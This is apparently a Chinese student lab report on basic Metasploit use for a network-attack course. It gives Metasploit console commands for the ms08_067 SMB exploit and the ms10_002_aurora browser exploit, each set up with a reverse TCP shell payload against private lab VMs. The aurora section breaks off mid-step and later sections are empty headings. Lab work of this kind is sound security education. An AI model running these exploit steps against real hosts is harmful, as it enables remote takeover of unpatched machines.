20155320《网络对抗》MSF基础应用

20155320《网络对抗》MSF基础应用

基础问题回答

(1)用自己的话解释什么是exploit,payload,encode

实践过程

  • 使用到的虚拟机IP
虚拟机 IP地址
靶机1 Windows XP 192.168.63.130
靶机2 Vivian xp 192.168.63.129
靶机 192.168.63.131
攻击机 kali2 192.168.63.133

1.1一个主动攻击实践——ms08_067漏洞攻击;

这次需要用到靶机和kali

  • 在kali的终端中输入msfconsole进入控制台

  • 输入use exploit/windows/smb/ms08_067_netapi 使用该模块

  • show targets查看可以被攻击的靶机的操作系统型号,由于我不是很 清楚我的XP型号,所以我选了0自动匹配

  • show playload可以查看可使用的载荷

  • set payload generic/shell_reverse_tcp,tcp反向回连

  • 输入如下完成配置

set LHOST 192.168.63.133 此IP是kali的IP
set LPORT 5320 端口
set RHOST 192.168.63.131 此IP是靶机WIN XP的IP,特定漏洞端口已经固定

  • show targets查看可以被攻击的靶机的操作系统型号,由于我不是很 清楚我的XP型号,所以我选了0自动匹配
    ,输入set target 0

  • 输入exploit 进行攻击

  • 然后成功攻击的标志是出现如下结果,成功获得了XP靶机的shellcode,输入命令ipconfig可以看到和在XP上一样的结果

MS10_002_aurora漏洞攻击;

  • 之前的配置和第一个主动攻击实验是一样的命令,依次输入如下即可
msfconsole
use exploit/windows/browser/ms10_002_aurora
set payload generic/shell_reverse_tcp
set LHOST 192.168.63.133 //设置kali攻击IP,
set RHOST 192.168.63.131
set SRVPORT 5320
  • 查看配置项,确认无误

  • 输入exploit 运行,成功生成了一个URL

  • 在靶机上的IE里输入URL,并

1.3 一个针对客户端的攻击,如Adobe;

1.4 成功应用任何一个辅助模块。

实验总结

猜你喜欢

转载自www.cnblogs.com/ljq1997/p/8969593.html